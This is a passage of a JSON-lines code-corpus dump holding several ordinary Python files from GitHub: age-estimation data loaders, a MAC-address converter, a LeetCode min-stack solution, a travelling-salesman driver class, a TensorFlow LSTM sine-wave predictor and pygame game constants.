rank):\n imgs = list()\n with open(file, mode='r') as csv_file:\n gt = csv.reader(csv_file, delimiter=',')\n for row in gt:\n img_name, age = row[0], row[1]\n img_path = os.path.join(data_dir, img_name)\n age = int(round(float(age)))\n if age > 10 * rank and age <= 10 * (rank + 1) and rank != 7:\n imgs.append((img_path, age))\n if rank == 7 and age > 10 * rank:\n imgs.append((img_path, age))\n return imgs\n\n\n\ndef loadage(data_dir, file, shuffle=True):\n imgs = list()\n with open(file) as f:\n for eachline in f:\n contents = eachline.strip().split(' ')\n img_name, age = contents[0], contents[1]\n img_path = os.path.join(data_dir, img_name)\n age = int(round(float(age)))\n # if age > 15 and age < 61:#16--60\n imgs.append((img_path, age))\n if shuffle:\n random.shuffle(imgs)\n return imgs\n\ndef loadface(data_dir, image_list_file):\n imgs = list()\n with open(image_list_file) as f:\n for eachline in f:\n 
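# each line looks like '<id-dir>/<image-name>'; the numeric identity label is parsed from the dir name below\n            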
contents = eachline.strip().split('/')\n label, img_name = contents[0], contents[1]\n img_path = os.path.join(data_dir, label, img_name)\n label = int(label[3:])\n imgs.append((img_path, label))\n return imgs\n\ndef normal_sampling(mean, label_k, std=1):\n return math.exp(-(label_k-mean)**2/(2*std**2))/(math.sqrt(2*math.pi)*std)\n\nclass Balance(data.Dataset):\n def __init__(self, transform):\n imgs = loadcsv(rootdir, trainlist) \n self.transform = transform\n self.class_dict = self._get_class_dict()\n self.imgs = imgs\n def _get_class_dict(self):\n class_dict = dict()\n for i in range(1,82):\n class_dict[str(i)] = []\n with open(trainlist, mode='r') as csv_file:\n gt = csv.reader(csv_file, delimiter=',')\n for i, row in enumerate(gt):\n age = int(round(float(row[1])))\n for j in range(1, 82):\n if age == j:\n class_dict[str(j)].append(i)\n return class_dict\n\n def __getitem__(self, index):\n sample_class = random.randint(1, 81)\n sample_indexes = self.class_dict[str(sample_class)]\n index = random.choice(sample_indexes)\n \n img_path, age = self.imgs[index]\n age = int(round(float(age)))\n img_path = os.path.join(rootdir, img_path)\n\n img = Image.open(img_path).convert(\"RGB\")\n\n label = [normal_sampling(int(age), i) for i in range(101)]\n label = [i if i > 1e-15 else 1e-15 for i in label]\n label = torch.Tensor(label)\n\n seq_rand = iaa.Sequential([iaa.RandAugment(n=2, m=10)])\n\n cv_img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n cv_img = seq_rand.augment_image(image=cv_img)\n img = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))\n\n img = self.transform(img)\n return img, age, label\n\n def __len__(self):\n return len(self.imgs)\n\n\nclass TrainM(data.Dataset):\n def __init__(self, transform):\n imgs = loadcsv(rootdir, trainlist) \n random.shuffle(imgs)\n self.imgs = imgs\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n\n label = [normal_sampling(int(age), i) for i in range(101)]\n label = [i if i > 1e-15 else 1e-15 for i in label]\n label = torch.Tensor(label)\n\n seq_rand = iaa.Sequential([iaa.RandAugment(n=2, m=10)])\n\n cv_img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n cv_img = seq_rand.augment_image(image=cv_img)\n img = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))\n\n # self.transform.transforms.append(CutoutDefault(20))\n\n img = self.transform(img)\n return img, age, label\n def __len__(self):\n return len(self.imgs)\n\nclass TestM(data.Dataset):\n def __init__(self, transform):\n imgs = loadcsv(rootdir, testlist) \n self.imgs = imgs\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n # img2 = img.transpose(Image.FLIP_LEFT_RIGHT)\n img = self.transform(img)\n # img2 = self.transform(img2)\n return img, age\n def __len__(self):\n return len(self.imgs)\n\nclass Face(data.Dataset):\n def __init__(self, dataset, InTrain, transform):\n if InTrain:\n imgs = loadface(RootDir[dataset], AllTrain[dataset]) \n UsedImages = imgs\n random.shuffle(UsedImages)\n else:\n imgs = loadface(RootDir[dataset], AllTest[dataset])\n UsedImages = imgs\n self.imgs = UsedImages\n self.transform = transform\n self.InTrain = InTrain\n def __getitem__(self, item):\n img_path, label = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n img = self.transform(img)\n return img, label\n def __len__(self):\n return len(self.imgs)\n\nclass AAR(data.Dataset):\n def __init__(self, 
transform, rank):\n imgs = loadrank(rootdir, testlist, rank) \n self.imgs = imgs\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n img = self.transform(img)\n return img, age\n def __len__(self):\n return len(self.imgs)\n\nclass Train(data.Dataset):\n def __init__(self, dataset, transform):\n imgs = loadage(RootDir[dataset], AllTrain[dataset]) \n UsedImages = imgs\n random.shuffle(UsedImages)\n self.imgs = UsedImages\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n\n label = [normal_sampling(int(age), i) for i in range(101)]\n label = [i if i > 1e-15 else 1e-15 for i in label]\n label = torch.Tensor(label)\n\n # seq_rand = iaa.Sequential([iaa.RandAugment(n=2, m=9)])\n\n # cv_img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n # cv_img = seq_rand.augment_image(image=cv_img)\n # img = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))\n\n img = self.transform(img)\n return img, age, label\n def __len__(self):\n return len(self.imgs)\n\nclass Test(data.Dataset):\n def __init__(self, dataset, transform):\n imgs = loadage(RootDir[dataset], AllTest[dataset])\n UsedImages = imgs\n self.imgs = UsedImages\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n img = self.transform(img)\n return img, age\n def __len__(self):\n return len(self.imgs)\n","repo_name":"Defiler24/GTA","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40949787587","text":"\nfrom pprint import pprint\nimport re\n\n\ndef convert_mac(mac_address):\n regex = re.compile(\n r\"[0-9a-f]{4}[.:-][0-9a-f]{4}[.:-][0-9a-f]{4}\"\n r\"|([0-9a-f]{2}[.:-]){5}[0-9a-f]{2}\"\n r\"|[0-9a-f]{12}\",\n re.IGNORECASE\n )\n if regex.fullmatch(str(mac_address)):\n mac = re.sub(r\"[-.:]\", \"\", mac_address)\n else:\n raise ValueError(f\"'{mac_address}' does not appear to be a MAC address\")\n\n new_mac = [mac[index : index + 2] for index in range(0, len(mac), 2)]\n return \":\".join(new_mac)\n\n\nif __name__ == \"__main__\":\n pprint(convert_mac(\"1a1b.2c2d.3e3f\"))\n pprint(convert_mac(\"111122223333\"))\n pprint(convert_mac(\"1111-2222-3333\"))\n\n\n","repo_name":"natenka/pyneng-tasks-solutions","sub_path":"answers/15_module_re/task_15_6.py","file_name":"task_15_6.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70399044909","text":"# Min Stack - https://leetcode.com/problems/min-stack/\nclass MinStack(object):\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.stack = []\n self.heap = []\n self.stackToHeap = {}\n self.heapToStack = {}\n \n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: void\n \"\"\"\n self.stack.append(x)\n self.heap.append(x)\n ix = len(self.heap) - 1\n self.stackToHeap[ix] = ix\n self.heapToStack[ix] = ix\n pix = self.getParentIndex(ix)\n while self.heap[ix] < self.heap[pix]:\n self.exchangeHeap(ix, pix)\n ix = pix\n pix = self.getParentIndex(ix)\n \n def pop(self):\n \"\"\"\n :rtype: void\n \"\"\"\n last_ix = len(self.stack) - 1\n ix = self.stackToHeap[last_ix]\n self.exchangeHeap(ix, last_ix)\n del self.stackToHeap[last_ix]\n del self.heapToStack[last_ix]\n 
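# the popped element was swapped into the heap's last slot above, so discard it here\n        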
self.heap.pop()\n        item = self.stack.pop()\n        if ix == last_ix:\n            return item\n        nix = None\n        while nix != ix:\n            nix = self.getMinValueIndex(ix)\n            self.exchangeHeap(nix, ix)\n            ix = nix\n        return item\n    \n    def getMinValueIndex(self, pix):\n        ix = pix\n        v = self.heap[pix]\n        lix = 2 * pix + 1\n        lv = self.tryGetHeapValue(lix)\n        if lv is not None and lv < v:\n            v = lv\n            ix = lix\n        rix = 2 * pix + 2\n        rv = self.tryGetHeapValue(rix)\n        if rv is not None and rv < v:\n            return rix\n        return ix\n    \n    def tryGetHeapValue(self, ix):\n        if ix >= len(self.heap):\n            return None\n        return self.heap[ix]\n\n    def top(self):\n        \"\"\"\n        :rtype: int\n        \"\"\"\n        return self.stack[len(self.stack) - 1]\n    \n    def getMin(self):\n        \"\"\"\n        :rtype: int\n        \"\"\"\n        return self.heap[0]\n    \n    def exchangeHeap(self, i, j):\n        self.exchange(self.heapToStack, i, j)\n        self.exchange(self.heap, i, j)\n        self.exchange(self.stackToHeap, self.heapToStack[i], self.heapToStack[j])\n    \n    def exchange(self, a, i, j):\n        t = a[i]\n        a[i] = a[j]\n        a[j] = t\n    \n    def getParentIndex(self, i):\n        if i == 0:\n            return 0\n        return (i - 1) // 2  # integer division: heap indices must be ints","repo_name":"igorsubbotin/leetcode_python","sub_path":"problem_155.py","file_name":"problem_155.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21422991353","text":"import random\n\nfrom Map.CountryMap import City\nfrom main import calculateDistance\n\n\nclass Driver:\n    listOfCities = []\n    distArray = []\n\n    def __init__(self, name, listOfCities):\n        self.name = name\n        self.listOfCities = listOfCities\n\n    def calculateRouteDistance(self):\n        distance = 0\n        for x in range (len(self.listOfCities)-1):\n            cityOrigin = self.listOfCities[x]\n            cityDestination = self.listOfCities[x+1]\n            twoPointDist = calculateDistance(cityOrigin.xPos, cityOrigin.yPos, cityDestination.xPos, cityDestination.yPos)\n            distance += twoPointDist\n            #print(\"Dist:\" + str(twoPointDist) + \" ; Point A: \" + str(cityOrigin.xPos) + \",\" + str(cityOrigin.yPos) +\n            #      \" ; Point b: \" + str(cityDestination.xPos) + \",\" + str(cityDestination.yPos))\n            #print(\"Current sum of distances: \" + str(distance))\n\n        return distance\n\n    def listDriverCities(self):\n        print(\"Listing cities\")\n        for x in range(len(self.listOfCities)):\n            print(self.name + \", City.\" + str(x) + \": \" + str(self.listOfCities[x].xPos) + \" \" + str(self.listOfCities[x].yPos))\n\n    # swaps order of two consecutive cities based on randomly generated number\n    def changeOrderOfTwoConsecutiveCities(self):\n        listLength = len(self.listOfCities)\n        swapIndex1 = 1\n        if listLength > 4:\n            swapIndex1 = random.randint(1, listLength-3) # first and last city must be Base City\n        elif listLength == 4:\n            swapIndex1 = 1 # first and last city must be Base City\n        swapIndex2 = swapIndex1+1\n        self.listOfCities[swapIndex1], self.listOfCities[swapIndex2] = self.listOfCities[swapIndex2], self.listOfCities[swapIndex1]\n\n\n    def changeOrderOfTwoRandomCities(self):\n        listLength = len(self.listOfCities)\n        swapIndex1 = random.randint(1, listLength-2) # first and last city must be Base City\n        swapIndex2 = random.randint(1, listLength-2)\n        # case when its BASE CITY xNumbOfCities BASE\n        if listLength > 3:\n            while swapIndex1 == swapIndex2:\n                swapIndex2 = random.randint(1, listLength-2)\n        self.listOfCities[swapIndex1], self.listOfCities[swapIndex2] = self.listOfCities[swapIndex2], self.listOfCities[swapIndex1]\n\n\n    def exchangeCity(self, city):\n        
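# intended behavior (assumed from the surrounding methods): overwrite a random interior city, keeping the base city at both ends\n        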
index = random.randint(1, len(self.listOfCities) - 2)\n        self.listOfCities[index] = city","repo_name":"Aygor113/TravellingSalesman","sub_path":"Driver/Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23850259113","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib as mpl\n\n# use a non-interactive backend so the script runs without displaying figures\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\n\n# number of hidden units\nHIDDEN_SIZE=30\n# number of LSTM layers\nNUM_LAYERS=2\n# length of the training sequences fed to the RNN\nTIMESTEPS=10\n# number of training steps\nTRAING_STEPS=10000\nBATCH_SIZE=32\n\n# number of training examples\nTRAING_EXAMPLES=10000\n# number of test examples\nTESTING_EXAMPLES=1000\n# sampling interval\nSAMPLE_GAP=0.01\n\ndef generate_data(seq):\n    x=[]\n    y=[]\n\n    # items i..i+TIMESTEPS-1 of the sequence form the input; item i+TIMESTEPS is the label\n    for i in range(len(seq)-TIMESTEPS):\n        x.append([seq[i:i+TIMESTEPS]])\n        y.append([seq[i+TIMESTEPS]])\n    return np.array(x,dtype=np.float32),np.array(y,dtype=np.float32)\n\n\ndef lstm_model(x,y,is_training):\n    # stack several LSTM layers\n    cell=tf.nn.rnn_cell.MultiRNNCell(\n        [tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE) for _ in range(NUM_LAYERS)]\n    )\n\n\n    # connect the stacked LSTM cells into an RNN and compute the forward pass;\n    # outputs holds the top layer's output at every step with shape [batch_size, time, HIDDEN_SIZE],\n    # and only the last time step is used for this problem\n    outputs,_=tf.nn.dynamic_rnn(cell,x,dtype=tf.float32)\n    output=outputs[:,-1,:]\n\n    # add a fully connected layer on top of the LSTM output and compute the loss\n    predictions=tf.contrib.layers.fully_connected(output,1,activation_fn=None)\n\n    # compute the loss and the training op only during training; at test time just return predictions\n    if not is_training:\n        return predictions,None,None\n\n    loss=tf.losses.mean_squared_error(labels=y,predictions=predictions)\n\n    # create the optimizer and get the training op\n    train_op=tf.contrib.layers.optimize_loss(\n        loss,tf.train.get_global_step(),\n        optimizer='Adagrad',learning_rate=0.1\n    )\n\n    return predictions,loss,train_op\n\n\ndef train(sess,train_x,train_y):\n    # feed the training data to the graph as a tf.data dataset\n    ds=tf.data.Dataset.from_tensor_slices((train_x,train_y))\n    ds=ds.repeat().shuffle(1000).batch(BATCH_SIZE)\n\n    x,y=ds.make_one_shot_iterator().get_next()\n\n    # call the model to get the predictions, the loss and the training op\n    with tf.variable_scope('model'):\n        predictions,loss,train_op=lstm_model(x,y,True)\n\n    # initialize variables\n    sess.run(tf.global_variables_initializer())\n    for i in range(TRAING_STEPS):\n        _,l=sess.run([train_op,loss])\n        if(i%1000==0):\n            print(\"train step:\"+str(i)+\",loss:\"+str(l))\n\n# evaluation\ndef run_eval(sess,test_x,test_y):\n    ds = tf.data.Dataset.from_tensor_slices((test_x, test_y))\n    ds = ds.batch(1)\n\n    x,y=ds.make_one_shot_iterator().get_next()\n\n\n    # call the model to get predictions; the true y values are not needed\n    with tf.variable_scope('model',reuse=True):\n        prediction,_,_=lstm_model(x,[0.0],False)\n\n\n    # collect the predictions into an array\n    predictions=[]\n    lables=[]\n    for i in range(TESTING_EXAMPLES):\n        p,l=sess.run([prediction,y])\n        predictions.append(p)\n        lables.append(l)\n\n    # compute RMSE as the evaluation metric\n    # squeeze removes the dimensions of size 1\n    predictions=np.array(predictions).squeeze()\n    lables=np.array(lables).squeeze()\n    rmse=np.sqrt(((predictions-lables)**2).mean(axis=0))\n    print(\"ROOT MEAN SQUARE ERROR is:%f\" %rmse)\n\n    # plot the predicted sin curve against the real one\n    plt.figure()\n    plt.plot(predictions,label='predictions')\n    plt.plot(lables,label='real_sin')\n    plt.legend()\n    plt.show()\n\n# generate the training and test sets from a sine wave\ntest_start=(TRAING_EXAMPLES+TIMESTEPS)*SAMPLE_GAP\ntest_end=test_start+(TESTING_EXAMPLES+TIMESTEPS)*SAMPLE_GAP\n\ntrain_x,train_y=generate_data(np.sin(np.linspace(0,test_start,TRAING_EXAMPLES+TIMESTEPS,dtype=np.float32)))\ntest_x,test_y=generate_data(np.sin(np.linspace(test_start,test_end,TESTING_EXAMPLES+TIMESTEPS,dtype=np.float32)))\n\nwith tf.Session() as sess:\n    train(sess,train_x,train_y)\n    run_eval(sess,test_x,test_y)\n\n\n\n\n\n\n","repo_name":"computer-jz/Tensorflow.1.14.0","sub_path":"8 
循环神经网络/8.4 例子.py","file_name":"8.4 例子.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25997965879","text":"import pygame\n\n# Initialization required to import TILESIZE\npygame.init()\n\nSCREEN_SCALE = 25 # The higher, the broader the camera\nTILESIZE = pygame.display.list_modes()[0][0] // SCREEN_SCALE\nPROJECTILE_SIZE = TILESIZE * (40/100)\nMAP_H = TILESIZE * 40\nMAP_W = TILESIZE * 40\n\nCOLORS = {\n \"BLACK\": (0, 0, 0),\n \"WHITE\": (255, 255, 255),\n \"BLUE\": (0, 0, 255),\n \"GREY\": (100, 100, 100),\n \"RED\": (200, 20, 20),\n \"GREEN\": (20, 200, 20),\n}\n\nFPS = 60\nSPEED = 0.3\nENEMY_SPEED = 0.1\n","repo_name":"pypaut/santarena","sub_path":"python/lib/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}